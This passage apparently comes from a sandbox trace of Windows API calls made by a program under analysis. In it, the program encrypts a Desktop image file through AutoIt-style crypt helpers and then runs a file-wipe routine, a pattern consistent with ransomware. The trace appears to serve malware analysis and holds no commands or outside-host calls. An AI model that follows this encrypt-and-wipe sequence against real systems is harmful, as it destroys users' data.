hHeap=0x8a0000) returned 1 [0168.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0168.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0168.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0168.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0168.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0168.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0168.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0168.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0168.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0168.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0168.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0168.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0168.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0168.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0168.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0168.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0168.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0168.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0168.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0168.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0168.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0168.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0168.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0168.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0168.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0168.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0168.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0168.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0168.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0168.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0168.069] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0168.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0168.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0168.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0168.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0168.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0168.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0168.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0168.070] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0168.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0168.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0168.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0168.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0168.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0168.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0168.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0168.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0168.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0168.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0168.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0168.070] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.070] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.070] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.070] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.070] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.070] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.070] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0168.070] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0168.070] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0168.070] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0168.070] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0168.070] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0168.070] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0168.070] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0168.070] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0168.070] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0168.071] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.071] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.071] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.071] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.071] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.071] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0168.071] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.071] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x41a7, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x41b0) returned 1 [0168.071] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.071] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.071] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.071] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.071] CharLowerBuffW (in: lpsz="byte[16817]", cchLength=0xb | out: lpsz="byte[16817]") returned 0xb [0168.071] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.073] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.073] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.073] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0168.073] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.073] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9ed4f0*, pdwDataLen=0x87e820*=0x41a7, dwBufLen=0x41b0 | out: pbData=0x9ed4f0*, pdwDataLen=0x87e820*=0x41b0) returned 1 [0168.073] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.073] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.073] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.074] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.074] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.074] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.075] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0168.075] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0168.075] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0168.075] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0168.075] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0168.075] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0168.075] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0168.075] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0168.075] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0168.075] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0168.075] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.077] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.077] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.077] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.081] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.081] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.081] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0168.081] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0168.081] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.081] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0168.081] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.081] CryptDestroyKey (hKey=0x90af18) returned 1 [0168.081] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0168.081] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0168.081] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0168.081] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0168.081] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0168.081] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0168.081] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0168.081] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0168.081] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0168.081] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0168.098] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0168.098] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0168.099] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0168.099] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0168.099] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.099] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0168.099] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.099] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0168.099] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0168.099] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0168.099] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.099] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0168.099] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0168.099] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.099] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.099] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0168.099] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0168.099] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0168.099] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.099] CryptReleaseContext (hProv=0x9c0c00, dwFlags=0x0) returned 1 [0168.099] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.099] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.099] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0168.099] FreeLibrary (hLibModule=0x74f20000) returned 1 [0168.100] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.100] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.100] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.101] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.103] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.104] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.104] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0168.104] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.105] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.105] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VLNsdshtM2X.png", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf332a6c0, ftCreationTime.dwHighDateTime=0x1d5df48, ftLastAccessTime.dwLowDateTime=0xc3dcaee0, ftLastAccessTime.dwHighDateTime=0x1d5e6d5, ftLastWriteTime.dwLowDateTime=0xc3dcaee0, ftLastWriteTime.dwHighDateTime=0x1d5e6d5, nFileSizeHigh=0x0, nFileSizeLow=0x41a7, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="VLNsdshtM2X.png", cAlternateFileName="VLNSDS~1.PNG")) returned 0x90ae18 [0168.105] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0168.105] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.105] CharLowerBuffW (in: lpsz="byte[16807]", cchLength=0xb | out: lpsz="byte[16807]") returned 0xb [0168.105] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.105] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0168.105] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.105] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0168.106] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0168.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0168.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0168.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0168.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c26d8 [0168.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c26d8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0168.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0168.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0168.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0168.106] 